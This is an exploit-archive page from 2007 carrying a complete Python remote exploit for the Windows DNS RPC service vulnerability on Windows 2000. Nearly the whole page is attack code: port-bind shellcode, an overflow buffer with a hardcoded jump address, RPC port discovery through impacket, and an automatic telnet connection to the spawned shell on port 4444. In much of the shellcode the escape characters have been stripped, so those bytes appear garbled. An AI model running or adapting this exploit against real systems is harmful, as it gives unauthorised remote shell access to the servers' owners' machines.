Home / exploits mswin-dns-meta.txt
Posted on 17 April 2007
#!/usr/bin/python # Remote exploit for the 0day Windows DNS RPC service vulnerability as # described in http://www.securityfocus.com/bid/23470/info. Tested on # Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 # and then connects to it. # # Cheers to metasploit for the first exploit. # Written for educational and testing purposes. # Author shall bear no responsibility for any damage caused by using this code # Winny Thomas :-) import os import sys import time from impacket.dcerpc import transport, dcerpc, epm from impacket import uuid #Portbind shellcode from metasploit; Binds port to TCP port 4444 shellcode = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" shellcode += "x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9" shellcode += "x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56" shellcode += "x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22" shellcode += "xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30" shellcode += "x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81" shellcode += "x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42" shellcode += "xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22" shellcode += "xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9" shellcode += "x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79" shellcode += "x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab" shellcode += "xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa" shellcode += "xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48" shellcode += "x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1" shellcode += "x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0" shellcode += "xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe" shellcode += "x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9" shellcode += "xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84" shellcode += "x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56" shellcode += "x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8" shellcode += "x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79" shellcode += "x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6" shellcode += "xbaxb5x60x56x39x4axb6xa9" # Stub sections taken from metasploit stub = 'xd2x5fxabxdbx04x00x00x00x00x00x00x00x04x00x00x00' stub += 'x70x00x00x00x00x00x00x00x1fx38x8ax9fx12x05x00x00' stub += 'x00x00x00x00x12x05x00x00' stub += '\A' * 465 # At the time of overflow ESP points into our buffer which has each char # prepended by a '' and our shellcode code is about 24+ bytes away from # where EDX points stub += '\x80\x62\xE1\x77'#Address of jmp esp from user32.dll # The following B's which in assembly translates to 'inc EDX' increments # about 31 times EDX so that it points into our shellcode stub += '\B' * 43 # Translates to 'jmp EDX' stub += '\xff\xe2' stub += '\A' * 134 stub += 'x00x00x00x00x76xcfx80xfdx03x00x00x00x00x00x00x00' stub += 'x03x00x00x00x47x00x00x00' stub += shellcode # Code ripped from core security document on impacket # www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf # Not a neat way to discover a dynamic port :-) def DiscoverDNSport(target): trans = transport.SMBTransport(target, 139, 'epmapper') trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) pm = epm.DCERPCEpm(dce) handle = 'x00'*20 while 1: dump = pm.portmap_dump(handle) if not dump.get_entries_num(): break handle = dump.get_handle() entry = dump.get_entry().get_entry() if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): port = entry.get_string_binding().split('[')[1][:-1] return int(port) print '[-] Could not locate DNS port; Target might not be running DNS' def ExploitDNS(target, port): trans = transport.TCPTransport(target, port) trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) dce.call(0x01, stub) def ConnectRemoteShell(target): connect = "/usr/bin/telnet " + target + " 4444" os.system(connect) if __name__ == '__main__': try: target = sys.argv[1] except IndexError: print 'Usage: %s <target ip address>' % sys.argv[0] sys.exit(-1) print '[+] Locating DNS RPC port' port = DiscoverDNSport(target) print '[+] Located DNS RPC service on TCP port: %d' % port ExploitDNS(target, port) print '[+] Exploit sent. Connecting to shell in 3 seconds' time.sleep(3) ConnectRemoteShell(target)
